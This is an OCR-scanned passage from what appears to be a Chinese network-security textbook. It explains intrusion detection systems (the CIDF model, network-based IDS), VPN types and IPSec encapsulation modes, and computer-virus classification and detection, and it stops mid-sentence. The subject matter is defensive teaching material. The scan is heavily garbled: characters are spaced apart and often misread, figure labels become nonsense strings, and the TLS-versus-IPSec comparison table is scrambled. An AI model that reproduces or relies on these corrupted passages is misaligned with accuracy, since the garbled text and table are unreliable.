更 改 , 这 通常 包括 文件 和 目录 的 内 容 及 属性 , 它 在 发 现 更 改 或 特洛伊 木马 应 用 程序 方面 特 
别 有 效 。 其 优点 是 只 要 成 功 的 攻击 导致 了 文件 或 其 他 对 象 的 任何 改变 , 它 都 能 发 现 ; 缺 点 
是 一 般 以 批 处 理 方式 实现 ,不 易于 实时 响应 。 


3. 入 侵 检 测 系 统 原理 简介 
通用 入 侵 检 测 架 构 (Common Intrusion Detection Framework. CIDF) [lf] 3E T A fz 4 
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测 系统 的 通用 模型 。 它 将 一 个 人 侵 检测 系统 分 为 以 下 组 件 : 

(D 事件 产生 器 (Event Generators) 。 

@ 事件 分 析 器 (Event Analyzers) 。 

图 响应 单元 (Response Units) 。 

CD 事件 数据 库 (Event Databases) 。 

CIDF 将 入侵 检测 系统 需要 分 析 的 数据 统称 为 事件 (Event), 它 可 以 是 基于 网 络 的 入 
侵 检 测 系 统 中 的 网 络 数据 包 , 也 可 以 是 基于 主机 的 入 侵 检测 系统 从 系统 日 志 等 其 他 途径 
得 到 的 信息 。 它 也 对 各 部 件 之 间 的 信息 传递 格式 .通信 方法 和 标准 API 进行 了 标准 化 。 
事件 产生 器 从 整个 计算 环境 中 获得 事件 ,并 提供 给 系统 的 其 他 部 分 。 事 件 分 析 器 对 
得 到 的 数据 进行 分 析 , 并 产生 分 析 结 果 。 响 应 单元 则 是 对 分 析 结 果 做 出 反应 的 功能 单元 ， 
它 可 以 做 出 切断 连接 改变 文件 属性 等 强烈 反应 ,甚至 发 动 对 攻击 者 的 反击 ,或 者 报警 。 
事件 数据 库 是 存放 各 种 中 间 数 据 和 最 终 数据 的 地 方 的 统称 , 它 可 以 是 复杂 的 数据 库 ,也 可 
以 是 简单 的 文本 文件 。 

一 个 人 侵 检测 系统 的 功能 结构 如 图 3-17 所 示 , 它 至 少 包 含 事件 提取 、 入 侵 分 析 、 入 侵 
响应 和 远程 管理 4 部 分 功能 。 


在 图 3-17 中 ,各 部 分 功能 如 下 : 入 侵 响应 poe! 远程 管理 
CD 事件 提取 功能 负责 提取 与 被 保护 系统 相关 的 运 P 

行 数据 或 记录 ,并 负责 对 数据 进行 简单 的 过 滤 。 ET 2n 
@ ARMES LEE RC IERORGRI IE CHE RE | mum 

出 入 侵 的 痕迹 ,区 分 授权 的 正常 访问 行为 和 非 授权 的 不 i 

正常 访问 行为 ,分 析 入 侵 行为 并 对 入侵 者 进行 定位 。 rmm 


C 入 侵 响应 功能 在 分 析出 入侵 行为 后 被 触发 ,根据 。 图 3-17 入 侵 检 测 系统 的 构成 
入 侵 行为 产生 响应 。 

@ 由 于 单个 人 侵 检测 系统 的 检测 能 力 和 检测 范围 有 限 , 和 人 侵 检测 系统 一 般 采 用 分 布 
监视 .集中 管理 的 结构 ,多 个 检测 单元 运行 于 网 络 中 的 各 个 网 段 或 系统 上 ,通过 远程 管理 
功能 在 一 台 管 理 站 上 实现 统一 的 管理 和 监控 。 

随 着 计算 机 网 络 技术 的 发 展 ,单独 依靠 主机 审计 入侵 检测 难以 适应 网 络 安全 需要 。 
在 这 种 情况 下 ,人 们 提出 了 基于 网 络 的 入侵 检测 系统 体系 结构 ,这 种 检测 系统 根据 网 络 流 
量 、 网 络 数据 包 和 协议 来 分 析 入 侵 检 测 。 

基于 网 络 的 入 侵 检测 系统 使 用 原始 网 络 包 作为 数据 包 。 基 于 网 络 的 IDS 通常 利用 
一 个 运行 在 随机 模式 下 的 网 络 适 配器 来 实现 监视 并 分 析 通 过 网 络 的 所 有 通信 业务 。 它 的 
攻击 辨别 模块 通常 采用 4 种 常用 技术 来 识别 攻击 技术 : 

(D 模式 .表达 式 或 字 节 匹配 。 

@ 频率 或 穿越 闵 值 。 

C 低级 事件 的 相关 性 。 

@ 统计 学 意义 上 的 非常 规 现象 检测 。 

一 旦 检测 到 攻击 行为 ,IDS 的 响应 模块 将 提供 多 种 选项 ,以 通知 、 报 警 并 对 攻击 采取 
相应 的 反应 。 
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基于 网 络 的 入 侵 检测 系统 主要 有 以 下 优点 : 

CD 拥有 成 本 低 。 基 于 网 络 的 IDS 可 以 部 署 在 一 个 或 多 个 关键 访问 点 来 检测 所 有 经 
过 的 网 络 通信 。 因 此 ,基于 网 络 的 IDS 系统 并 不 需要 安装 在 各 种 各 样 的 主机 上 ,从 而 大 
大 减 小 了 管理 的 复杂 性 。 

@ 攻击 者 转移 证 据 困难 。 基 于 网 络 的 IDS 使 用 活动 的 网 络 通 信 进 行 实 时 攻击 检测 ， 
因此 攻击 者 无 法 转移 证 据 , 被 检测 系统 捕获 的 数据 不 仅 包括 攻击 方法 ,而 且 包括 对 识别 和 
指控 入侵 者 十 分 有 用 的 信息 。 

@ 实时 检测 和 响应 。 一 旦 发 生 恶 意 访问 或 攻击 ,基于 网 络 的 IDS 检测 即 可 随时 发 
现 ,并 能 够 很 快 地 做 出 反应 。 这 种 实时 性 使 系统 可 以 根据 预先 定义 的 参数 迅速 采取 相应 
的 行动 ,从 而 将 入 侵 活动 对 系统 的 破坏 降 到 最 低 。 

CD 能 够 检测 未 成 功 的 攻击 企图 。 置 于 防火 墙 外 部 的 NIDS 可 以 检测 到 旨 在 利用 位 
于 防火 墙 后 面 的 服务 器 等 资源 的 攻击 ,尽管 防火 墙 本 身 可 能 会 拒绝 这 些 攻 击 企图 。 

C» 操作 系统 独立 。 基 于 网 络 的 IDS 并 不 依赖 于 将 主机 的 操作 系统 作为 检测 资源 ,而 
基于 主机 的 系统 需要 特定 的 操作 系统 才能 发 挥 作用 。 

基于 网 络 的 入 侵 检测 产品 放置 在 比较 重要 的 网 段 内 ,可 连续 监视 网 段 中 的 各 种 数据 
包 , 对 每 个 数据 包 或 可 疑 的 数据 包 进 行 特征 分 析 。 如 果 数 据 包 与 产品 内 置 的 某 些 规则 吻 
合 , 入 侵 检测 系统 就 会 发 出 警报 甚至 直接 切断 网 络 连 接 。 目 前 ,大 部 分 人 侵 检测 产品 都 基 
于 网 络 。NIDS 整体 框架 流程 图 如 图 3-18 所 示 。 
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3-18 NIDS 整体 框架 流程 图 


3.2.3. ”虚拟 专 网 


1. VPN 概述 

随 着 电子 商务 和 电子 政务 应 用 的 日 益 普及 , 越 来 越 多 的 企业 欲 把 处 于 世界 各 地 的 分 
支 机 构 ,供应 商 和 合作 伙伴 通过 Internet 连接 在 一 起 ,以 加 强 总 部 与 各 分 支 机 构 的 联系 ， 
提高 企业 与 供应 商 和 合作 伙伴 之 间 的 信息 交换 速度 ;使 移动 办 公 人 员 能 在 出 差 时 访问 总 
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部 的 网 络 进行 信息 交换 。 随 着 全 球 化 步伐 的 加 快 和 公司 业务 的 增长 ,移动 办 公 人 员 会 越 
来 越 多 ,公司 的 客户 关系 也 越 来 越 庞大 。 在 这 种 背景 下 ,人 们 便 想到 是 否 可 以 使 用 无 处 不 
在 的 Internet 来 构建 企业 自己 的 专用 网 络 。 这 种 需求 就 导致 了 虚拟 专 网 (Virtual Private 
Network,VPN) 概 念 的 出 现 。 

采用 VPN 技术 组 网 ,企业 可 以 以 一 种 相对 便宜 的 月 付费 方式 上 网 。 然 而 , Internet 
是 一 个 共享 的 公共 网 络 ,因此 不 能 保证 数据 在 两 点 之 间 传 递 时 不 被 他 人 窃取 。 要 想 安 全 
地 将 两 个 企业 子 网 连 在 一 起 ,或 者 确保 移动 办 公 人 员 能 安全 地 远程 访问 公司 内 部 的 秘密 
资源 ,就 必须 保证 Internet 上 传输 数据 的 安全 ,并 对 远程 访问 的 移动 用 户 进行 身份 认证 。 

所 谓 虚拟 专 网 ,是 指 将 物理 上 分 布 在 不 同 地 点 的 网 络 通 过 公用 网 络 连 接 而 构成 逻辑 
上 的 虚拟 子 网 。 它 采用 认证 ,访问 控制 ,机密 性 、 数 据 完整 性 等 安全 机 制 在 公用 网 络 上 构 
建 专用 网 络 ,使 得 数据 通过 安全 的 “加 密 管道 ?在 公用 网 络 中 传播 ,这 里 的 公用 网 通常 指 
Internet, 

VPN 技术 实现 了 内 部 网 信息 在 公用 信息 网 中 的 传输 ,就 如 同 在 茫茫 的 广域网 中 为 用 
户 拉 出 一 条 专线 。 对 于 用 户 来 讲 , 公 用 网 络 起 到 了 “虚拟 ”的 效果 ,虽然 他 们 身 处 世界 的 不 
同 地 方 , 但 感觉 仿佛 是 在 同一 个 局 域 网 里 工作 。VPN 对 每 个 使 用 者 来 说 也 是 “专用 ”的 。 
也 就 是 说 ,VPN 根据 使 用 者 的 身份 和 权限 ,直接 将 其 接 入 VPN, 非 法 的 用 户 不 能 接 入 
VPN 并 使 用 其 服务 。 

VPN 应 具备 以 下 几 个 特点 : 

CD 费用 低 。 由 于 企业 使 用 Internet 进行 数据 传输 ,相对 于 租用 专线 来 说 ,费用 极为 
低廉 ,所 以 VPN 的 出 现 使 企业 通过 Internet 既 安 全 又 经 济 地 传输 机 密 信息 成 为 可 能 。 

@ 安全 保障 。 虽 然 实现 VPN 的 技术 和 方式 很 多 ,但 所 有 的 VPN 均 应 保证 通过 公用 
网 络 平台 所 传输 数据 的 专用 性 和 安全 性 。 在 非 面向 连接 的 公用 TP 网 络 上 建立 一 个 逻辑 
的 、 点 对 点 的 连接 , 称 为 建立 了 一 个 隧道 。 经 由 隧道 传输 的 数据 采用 加 密 技 术 进行 加 密 ， 
以 保证 数据 仅 被 指定 的 发 送 者 和 接收 者 知道 ,从 而 保证 了 数据 的 专用 性 和 安全 性 。 

@ 服务 质量 保证 (QoS)。VPN 应 当 能 够 为 企业 数据 提供 不 同等 级 的 服务 质量 保证 。 
不 同 的 用 户 和 业务 对 服务 质量 (QoS) 保 证 的 要 求 差别 较 大 。 例 如 ,对 于 移动 办 公用 户 来 
说 ,网 络 能 提供 广泛 的 连接 和 覆盖 性 是 保证 VPN 服务 质量 的 一 个 主要 因素 ;而 对 于 拥有 
众多 分 支 机 构 的 专线 VPN, 则 要 求 网 络 能 提供 良好 的 稳定 性 ;其 他 一 些 应 用 (如 视频 等 ) 
则 对 网 络 提出 了 更 明确 的 要 求 , 如 网 络 时 延 及 误 码 率 等 。 

CD 可 扩充 性 和 灵活 性 。VPN 必须 能 够 支持 通过 内 域 网 (Intranet) 和 外 联网 
(CExtranet) 的 任何 类 型 的 数据 流 .方便 增加 新 的 节点 .支持 多 种 类 型 的 传输 媒介 ,可 以 满 
足 同 时 传输 语音 、 图 像 和 数据 对 高 质量 传输 及 带宽 增加 的 需求 。 

C 可 管理 性 。 从 用 户 角 度 和 运营 商 角度 来 看 .对 VPN 进行 管理 和 维护 应 该 非常 方 
便 。 在 VPN 管理 方面 ,VPN 要 求 企 业 将 其 网 络 管理 功能 从 局 域 网 无 缝 地 延伸 到 公用 网 ， 
甚至 是 客户 和 合作 伙伴 处 。 虽 然 可 以 将 一 些 次 要 的 网 络 管理 任务 交 给 服务 提供 商 去 完 
成 ,企业 自己 仍 需要 完成 许多 网 络 管理 任务 。 因 此 ,VPN 管理 系统 是 必 不 可 少 的 。VPN 
管理 系统 的 主要 功能 包括 安全 管理 .设备 管理 .配置 管理 .访问 控制 列表 管理 .QoS 管理 
等 内 容 。 
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2. VPN 分 类 

根据 VPN 组 网 方式 、 连 接 方式 ,访问 方式 、 隧 道 协 议和 工作 层次 (OSI 模型 或 TCP/ 
IP 模型) 的 不 同 ,VPN 可 以 有 多 种 分 类 方法 。 

车 按 协议 分 类 ,VPN 可 以 分 为 PPTP VPN、L2TP VPN、MPLS VPN,IPSec VPN, 
GRE VPN .SSL VPN Open VPN, 

车 按 协议 工作 在 OSI 7 层 模 型 的 不 同 层 上 分 类 ,可 以 分 为 : 第 2 层 数 据 链 路 层 中 的 
PPTP VPN,L2TP VPN,MPLS VPN; 第 3 层 网 络 层 的 IPSec、GRE; 以 及 位 于 传输 层 与 
应 用 层 之 间 的 SSL VPN. 

根据 访问 方式 的 不 同 ,VPN 可 分 为 两 种 类 型 : 一 种 是 移动 用 户 远程 访问 VPN 连接 ; 
另 一 种 是 网 关 - 网 关 VPN 连接 。 这 两 种 VPN 在 Internet 中 的 应 用 最 为 广泛 。 

C 远程 访问 VPN。 移 动用 户 远程 访问 VPN 连接 ,由 远程 访问 的 客户 机 提出 连接 请 
求 ,VPN 服务 器 提供 对 VPN 服务 器 或 整个 网 络 资源 的 访问 服务 。 在 此 连接 中 , 链 路 上 第 
一 个 数据 包 总 是 由 远程 访问 客户 机 发 出 。 在 远程 访问 客户 机 先 向 VPN 服务 器 提供 自己 
的 身份 之 后 ,VPN 服务 器 也 向 客户 机 提供 自己 的 身份 。 远 程 访问 VPN 组 成 如 图 3-19(a) 
所 示 。SSL VPN 是 远程 访问 VPN 的 一 个 具体 实现 。 

Q 网 关 -网 关 VPN。 网 关 - 网 关 VPN 连接 ,由 呼叫 网 关 提 出 连接 请 求 , 另 一 端的 
VPN 网 关 做 出 响应 。 在 这 种 方式 中 , 链 路 的 两 端 分 别 是 专用 网 络 的 两 个 不 同 部 分 ,来 自 
呼叫 网 关 的 数据 包 通 常 并 非 源 自 该 网 关 本 身 , 而 是 来 自 其 内 网 的 子 网 主机 。 呼 叫 网 关 首 
先 向 应 答 网 关 提 供 自 己 的 身份 ,作为 双向 认证 的 第 二 步 , 应 答 网 关 也 应 向 呼叫 网 关 提 供 自 
己 的 身份 。 网 关 - 网 关 VPN 的 组 成 如 图 3-19(b) 所 示 。IPSec VPN 是 网 关 - 网 关 VPN 的 


一 个 具体 实现 。 
VPN 隧 道 VPN 连 接 d 
Cu VPNZTGME 


VPN 网 关 。 (a) 移动 用 户 远程 访问 VPN 


VPN 隧 道 VPN 连 接 
PS 


四 一 一 
"-— 


VPN 网 关 VPN 网 关 
(b) 网 关 -网 关 VPN 连 接 


3-19 ”典型 VPN 的 组 成 


3. IPSec VPN 原理 简介 
VPN 的 精髓 在 于 对 数据 包 进 行 重新 封装 。 因 篇 幅 原 因 , 这 里 仅 简 要 介绍 IPSec VPN 
的 工作 原理 。 若 想 了 解 SSL VPN 及 其 他 类 型 VPN 的 工作 原理 ,请 读者 查阅 相关 资料 。 
IPSec 的 工作 原理 类 似 于 包 过 滤 防 火 墙 . 可 以 把 它 看 作 包 过 滤 防 火 墙 的 一 种 扩展 。 
我 们 知道 ,防火墙 在 接收 到 一 个 IP 数据 包 时 , 它 就 在 规则 表 中 查找 是 否 有 与 数据 包 的 头 
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部 相 匹配 的 规则 。 当 找到 一 个 相 匹配 的 规则 时 , 包 过 滤 防 火 墙 就 按照 该 规则 的 要 求 对 接 
收 到 的 IP 数据 包 进 行 处 理 : 丢弃 或 转发 。 

IPSec 通过 查询 安全 策略 数据 库 (Security Policy Database,SPD) 决 定 如 何 对 接收 到 
的 IP 数据 包 进 行 处 理 。 但 是 IPSec 与 包 过 滤 防 火 墙 不 同 , 它 对 IP 数据 包 的 处 理 方法 除 
了 丢弃 和 直接 转发 ( 绕 过 IPSec) 外 ,还 可 以 对 数据 包 进行 IPSec 处 理 。 正 是 这 种 新 增添 的 
处 理 方法 ,使 VPN 提供 了 比 包 过 滤 防 火 墙 更 高 的 安全 性 。 

进行 IPSec 处 理 意味 着 对 IP 数据 包 进 行 加 密 和 认证 。 包 过 滤 防 火 墙 只 能 控制 来 自 
或 去 往 某 个 站 点 的 TP 数据 包 的 通过 . 即 它 可 以 拒绝 来 自 某 个 外 部 站 点 的 IP 数据 包 访问 
内 部 网 络 资源 ,也 可 以 拒绝 某 个 内 部 网 络 用 户 访问 某 些 外 部 网 站 。 但 是 包 过 滤 防 火 墙 不 
能 保证 自 内 部 网 络 发 出 的 数据 包 不 被 截取 ,也 不 能 保证 进入 内 部 网 络 的 数据 包 未 经 算 改 。 
只 有 在 对 IP 数据 包 实 施 了 加 密 和 认证 后 ,才能 保证 在 公用 网 络 上 传输 数据 的 机 密 性 、 认 
证 性 和 完整 性 。 

IPSec 既 可 以 对 IP 数据 包 只 进行 加 密 或 认证 ,也 可 以 同时 实施 加 密 和 认证 。 但 无 论 
是 进行 加 密 还 是 进行 认证 ,IPSec 都 有 两 种 工作 模式 : 一 种 是 传输 模式 ; 另 一 种 是 隧道 
模式 。 

采用 传输 模式 时 ,IPSec 只 对 TP 数据 包 的 净 荷 进行 加 密 或 认证 。 此 时 ,封装 数据 包 
继续 使 用 原 TP 头 部 ,只 对 IP 头 部 的 部 分 域 进行 修改 ,而 IPSec 协议 头 部 插入 到 原 IP 头 
部 和 传输 层 头 部 之 间 。IPSec 传输 模式 的 ESP 封装 如 图 3-20 所 示 ,传输 模式 的 AH 封装 
如 图 3-21 所 示 。 


| 原 Ip 头 | remuoes. 数据 内 容 


mx ”| ESP | TCP/UDP 头 | 数据 内 容 | BSP 尾 
图 3-20 ”传输 模式 的 ESP 封装 示意 图 


| 原 Ip 头 “| TCP/UDP 头 | 数据 内 容 


E 


: 原 IP 头 AH 头 TCP/UDP 头 | 数据 内 容 
图 3-21 传输 模式 的 AH 封装 示意 图 


采用 隧道 模式 时 ,IPSec 对 整个 IP 数据 包 进 行 加 密 或 认证 。 此 时 ,需要 产生 一 个 新 
的 IP 头 ,IPSec 头 被 放 在 新 产生 的 IP 头 和 原 IP 数据 包 之 间 , 从 而 组 成 一 个 新 的 IP 头 。 
IPSec 隧道 模式 的 ESP 封装 如 图 3-22 所 示 ,隧道 模式 的 AH 封装 图 3-23 所 示 。 


原 IP 头 TCP/UDP 头 | 数据 内 容 


新 IP 头 ESP 头 原 IP 头 “| TCP/UDP 头 | 数据 内 容 ESP 尾 
3-22 IPSec 隧道 模式 的 ESP 封装 示意 图 
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FUP 


TCP/UDP 头 | 数据 内 容 


[P| aH | omuex 


TCP/UDP X. 数据 内 容 


3-23 IPSec 隧道 模式 的 AH 封装 示意 图 


4. TLS VPN 与 IPSec VPN 的 比较 
TLS VPN 与 IPSec VPN 的 性 能 比较 如 表 3-6 所 示 。 


3 3-6 TLS VPN 5 IPSec VPN 的 性 能 比较 
yt 项 TLS VPN IPSec VPN 
单 向 身份 验证 z 
身份 验证 。 | 双向 身份 验证 Se 
数字 证 书 
强加 密 强加 密 
基于 Web 浏览 器 依靠 执行 
aman AAA 网 络 边缘 到 客户 端 
: 程 安全 性 | 从 客户 到 资源 端 全 程 加 密 仅 对 从 客户 到 VPN 网 关 之 间 的 通道 加 密 
可 访 间 性 。 | 适用 于 任何 时 间 、 任 何 地 点 访问 限制 适用 于 已 经 定义 好 受 控 用 户 的 访问 
费用 低 (无 需 任何 附加 客户 端 软件 ) 高 (需要 管理 客户 端 软件 ) 
"m 即 插 即 用 安装 通常 需要 长 时 间 的 配置 
无 需 任 何 附加 的 客户 端 软 ,硬件 需要 客户 端 软件 或 硬件 
对 用 户 非常 友好 ,使 用 非常 熟悉 的 |， 
用 户 易 使 用 性 | Web 浏览 器 2. MORS 
无 需 终端 用 户 的 培训 
基于 Web 的 应 用 
支持 的 应 用 | 文件 共享 所 有 基于 IP 的 服务 
E-mail 
n gn HK ERU B 和 
| 在 服务 器 端 容 易 实现 自由 伸缩 ,在 客户 端 比 
nr 
穿越 防火 增 “| 可 以 不 可 以 
3.2.4 计算 机 病毒 防护 技术 


1. 计算 机 病毒 防护 概述 

计算 机 病毒 很 早 就 伴随 着 计算 机 技术 的 发 展 而 出 现 ,是 计算 机 与 网 络 技术 发 展 历史 
中 最 早出 现 的 攻击 手段 。 作 为 安全 攻击 的 重要 技术 实施 手段 和 载体 ,其 对 计算 机 与 网 络 
安全 的 威胁 一 直 持 续 至 今 ,对 其 的 防御 也 一 直 是 计算 机 网 络 安全 中 重要 的 一 环 。 
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CD 计算 机 病毒 的 定义 和 特点 

从 广义 上 讲 , 能 够 引起 计算 机 故障 、 破 坏 计 算 机 数据 .影响 计算 机 正常 运行 的 指令 或 
代码 , 均 统称 为 计算 机 病毒 (computer virus)。 在 计算 机 发 展 过 程 中 ,专家 和 研究 者 们 曾 
对 计算 机 病毒 提出 过 不 尽 相 同 的 定义 ,但 一 直 没 有 公认 的 明确 定义 。 随 着 计算 机 技术 的 
发 展 和 大 量 应 用 ,各 国政 府 都 制定 了 信息 安全 法 ,也 给 出 了 计算 机 病毒 的 定义 。 我 国 
1994 年 2 H 18 日 颁布 实施 的 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 中 的 第 二 
十 八条 规定 :“ 计 算 机 病毒 ,是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 筑 
坏 数 据 , 影 响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。” 

技术 向 来 是 一 把 * 双 刃 剑 ”, 编 写 计算 机 病毒 所 使 用 的 技术 和 方法 与 正常 的 计算 机 程 
序 一 样 ,只 是 因 目 的 不 同 而 使 其 具有 非常 鲜明 的 特点 。 计 算 机 病毒 的 主要 特点 如 下 : 

(D 破坏 性 。 破 坏 性 是 计算 机 病毒 的 首要 特征 ,不 具有 破坏 行为 的 指令 或 代码 不 能 称 
为 计算 机 病毒 。 任 何 病毒 只 要 侵入 系统 ,都 会 对 系统 及 应 用 程序 产生 不 同 程度 的 影响 , 轻 
者 占用 系统 资源 、 降 低 计算 机 工作 效率 , 重 者 窃取 破坏 数据 ,破坏 正常 程序 ,甚至 导致 系统 
Hw. 

@ 传染 性 。 计 算 机 病毒 同 自然 界 的 生物 病毒 一 样 具 有 传染 性 。 病 毒 作者 为 了 最 大 
限度 地 达到 其 目的 ,总 会 尽力 使 病毒 传播 到 更 多 的 计算 机 系统 上 。 病 毒 通常 会 通过 网 络 、 
移动 存储 介质 等 各 种 渠道 ,从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 机 中 ,感染 型 病毒 
会 通过 直接 将 自己 植 和 人 正常 文件 的 方式 来 进行 传播 。 

C) 隐蔽 性 。 计算机 病毒 通常 没有 任何 可 见 的 界面 ,为 了 最 大 限度 地 提高 自己 在 被 攻 
击 的 系统 上 的 生命 周期 ,会 采用 隐藏 进程 文件 等 手段 ,千方百计 地 隐藏 自己 的 行 迹 ,以 防 
止 被 发 现 . 被 删除 。 

(2) 计算 机 反 病 毒 技术 与 发 展 历史 

随 着 计算 机 病毒 的 出 现 及 其 对 用 户 的 危害 程度 ,为 了 阻止 病毒 的 攻击 ,计算 机 反 病 毒 
技术 也 随 之 而 产生 。 反 病毒 技术 的 根本 目的 是 为 了 防御 病毒 的 攻击 ,保护 计算 机 与 数据 
的 安全 。 病 毒 与 反 病毒 的 斗争 是 一 个 长 期 过 程 , 随 着 计算 机 及 其 相关 技术 的 发 展 而 发 展 ， 
呈现 出 一 种 交替 上 升 的 状态 。 根 据 病 毒 的 特点 , 反 病 毒 的 核心 思想 是 在 病毒 的 存储 、 传 播 
和 执行 等 阶段 ,基于 “发 现 ”“ 拦 截 *“ 清 除 ” 等 基本 手段 来 对 抗 病 毒 。 反 病毒 的 技术 和 形式 
从 发 展 初期 至 今 经 历 了 三 个 主要 阶段 : 

CD 基于 简单 特征 码 查 杀 的 单一 专 杀 工具 阶段 。 在 病毒 出 现 的 早期 (主要 在 DOS 时 
代 ) ,病毒 的 总 体 数 量 和 家 族 较 少 , 反 病毒 工具 多 是 针对 一 种 或 几 种 的 专 杀 工 具 。 工 具 通 
过 预先 提取 的 病毒 样本 的 特征 ,对 计算 机 的 软盘 、 硬 盘 、 内 存 中 的 文件 或 代码 进行 对 比 ,以 
此 来 判定 病毒 并 进行 清除 。 这 时 的 反 病 毒 工具 只 能 进行 被 动 查 杀 ,还 不 具有 对 病毒 的 主 
动 拦截 防御 能 力 。 

@ 基于 广 谱 特征 码 查 杀 主动 防御 拦截 的 综合 杀毒 软件 阶段 。 随 着 计算 机 发 展 和 普 
及 以 及 病毒 的 大 量 泛滥 (Windows 时 代 ) , 反 病毒 技术 开始 使 用 广 谱 特 征 码 识别 和 主动 防 
御 拦 截 技 术 来 对 抗 病毒 ,并 出 现 了 查 、 杀 、 防 三 合 一 的 通用 综合 杀毒 软件 。 

@ 基于 云 人工 智能 和 大 数据 技术 的 互联 网 查 杀 阶段 。 随 着 互联 网 技术 的 发 展 与 应 
,病毒 数量 剧 增 ,传播 速度 也 快速 提高 .同时 , 反 病 毒 技术 也 在 快速 发 展 。 当 前 ,基于 互 
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联网 的 云 查 杀 技术 基于 人 工 智能 学 习 算法 的 人 工 智 能 查 杀 引 擎 技术 已 被 广泛 使 用 ,基于 
大 数据 的 反 病 毒 技术 也 在 快速 发 展 。 


2. 计算 机 病毒 分 类 

计算 机 病毒 根据 不 同 的 维度 ,可 以 按 行 为 .存在 媒质 、 系 统 平台 等 进行 分 类 ,目前 较 常 
使 用 的 是 按 病毒 的 行为 特点 进行 分 类 。 以 下 列 出 了 计算 机 病毒 的 一 些 主要 类 型 : 

(D 木马 型 病毒 (Trojan)。 其 名 称 来 自 于 古 希 腊 * 特 洛 伊 木 马 ? 的 典故 ,是 指 通过 隐 
藏 .伪装 等 手段 ,以 正常 程序 的 面貌 欺骗 用 户 , 来 达到 传播 .执行 的 计算 机 病毒 。 

@ 感染 型 病毒 (Virus) 。 是 指 将 病毒 代码 附加 到 被 感染 的 宿主 文件 (如 Windows 可 
执行 文件 .可 运行 宏 的 Microsoft Office 文件 ) 中 的 计算 机 病毒 ,其 通过 这 种 手段 进行 传播 
和 获得 运行 权 。 

C) 是 虫 型 病毒 (Worm) 。 是 指 利用 系统 的 漏洞 .邮件 .共享 目录 、 可 传输 文件 的 软件 
(如 MSN QQ 等 ) .可 移动 存储 介质 (如 U 盘 、 移 动 硬盘 ) 等 ,进行 自我 传播 的 计算 机 病毒 。 

CD 后 门 型 病毒 (Backdoor) 。 是 指 在 受 感染 系统 中 隐藏 运行 ,并 接收 远程 的 命令 ,可 
以 进行 远程 控制 的 计算 机 病毒 。 

@ 恶意 软件 (Malware) 。 是 指 具 有 一 定 正常 功能 ,但 以 病毒 手段 进行 传播 .隐藏 和 防 
删除 的 软件 ,也 常 被 称 为 “ 流 谍 软件 ”"。 恶 意 软件 比较 典型 的 代表 为 “恶意 广告 软件 ”。 

以 行为 分 类 的 这 种 方法 ,在 病毒 与 反 病 毒 发 展 历史 的 早期 就 成 为 惯例 一 直 沿用 至 今 ， 
但 随 着 病毒 与 反 病 毒 技 术 的 发 展 ,计算 机 病毒 行为 的 边界 已 经 不 像 当 初 那 样 清晰 。 当 前 ， 
多 数 计算 机 病毒 会 同时 采用 多 种 行为 和 手段 ,可 能 同时 具有 多 种 类 型 的 特点 。 


3. 计算 机 病毒 检测 原理 简介 

计算 机 病毒 防护 中 最 前 端 和 最 主要 吸 待 解决 的 问题 就 是 对 病毒 的 发现” 能力 ,因此 ， 
对 病毒 的 准确 检测 是 反 病 毒 技 术 中 最 重要 的 部 分 。 

(1) 计算 机 病毒 检测 的 基本 原理 

计算 机 病毒 检测 的 基本 原理 : 通过 对 文件 .代码 ,行为 等 进行 数据 采样 ,然后 将 采样 
结果 和 基准 进行 匹配 ,再 根据 匹配 结果 去 判定 病毒 。 采 样 .匹配 和 基准 是 病毒 检测 技术 中 
3 个 最 主要 的 部 分 。 

(D 采样 。 所 谓 采 样 是 指 对 检测 目标 按 特定 位 置 进行 一 定 大 小 的 数据 采集 。 位 置 既 
可 以 是 绝对 的 文件 偏 移 ,也 可 以 是 解析 文件 格式 后 的 相对 偏 移 ( 如 相对 于 执行 代码 入 口 的 
偏 移 、 相 对 结构 的 偏 移 ) ,或 者 一 定 范围 的 浮动 偏 移 。 采样 的 位 置 和 大 小 取决 于 检测 算法 
与 方式 ,用 不 同 的 检测 方式 进行 采样 也 各 不 相同 。 

@ 匹配 。 所 谓 匹 配 是 指 将 采样 的 数据 与 规则 进行 比较 ,以 判别 当前 目标 。 匹 配 的 方 
法 既 可 以 是 精确 的 匹配 算法 ,也 可 以 是 模糊 的 .相似 度 的 匹配 算法 。 

@ 基准 。 所 谓 基 准 是 指 预先 通过 对 已 知 病毒 样本 进行 分 析 处 理 而 制作 的 病毒 特征 
数据 库 或 病毒 样本 算法 模型 ,通常 称 为 “病毒 库 ”。 病毒 库 的 建立 是 反 病毒 软件 公司 对 收 
集 到 的 未 知 样本 进行 分 析 处 理 ( 包 括 人 工 处 理 和 自动 处 理 ) 后 , 按 一 定 方法 对 判定 的 病毒 
样本 提取 特征 或 进行 算法 学 习 训练 而 建立 的 。 
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(2) 计算 机 病毒 的 主流 检测 技术 

基于 病毒 检测 的 基本 原理 ,目前 已 发 展 出 多 种 病毒 检测 技术 ,并 且 在 实际 的 反 病毒 应 
用 中 常常 同时 配合 使 用 ,以 适合 对 不 同 场景 ,不 同 病 毒 类 型 的 检测 。 以 下 为 当前 在 反 病 毒 
领域 普遍 使 用 的 一 些 主流 检测 技术 : 

(D 基于 特征 码 的 传统 检测 技术 。 特 征 码 查 杀 技 术 是 病毒 检测 最 早 采用 的 技术 ,采样 
和 匹配 方式 相对 简单 。 其 采样 多 为 固定 位 置 的 二 进 制 数据 ,在 匹配 上 基本 都 采用 精确 匹 
配方 式 。 特 征 码 查 杀 方式 的 优点 是 技术 简单 、 易 于 实现 、 查 杀 精 准 , 缺 点 主要 是 反应 速度 
慢 ( 需 用 户 更 新 病毒 库 ) .无 法 查 杀 未 知 病毒 .病毒 库 较 大 。 

@@ 基于 行为 的 动态 检测 技术 。 动 态 检测 是 指针 对 病毒 动态 行为 进行 检测 的 技术 。 
这 种 “行为 一般 是 通过 对 病毒 运行 后 的 系统 功能 调用 和 参数 抽象 得 出 ,如 “ 读 写 指定 文件 
或 注册 表 项 “启动 进程 等。 动态 检测 技术 一 般 与 反 病 毒 的 主动 防御 (基于 系统 API 
HOOK) , 沙 箱 等 技术 结合 使 用 。 动 态 检测 的 主要 优点 是 对 在 文件 上 与 反 病毒 检测 进行 
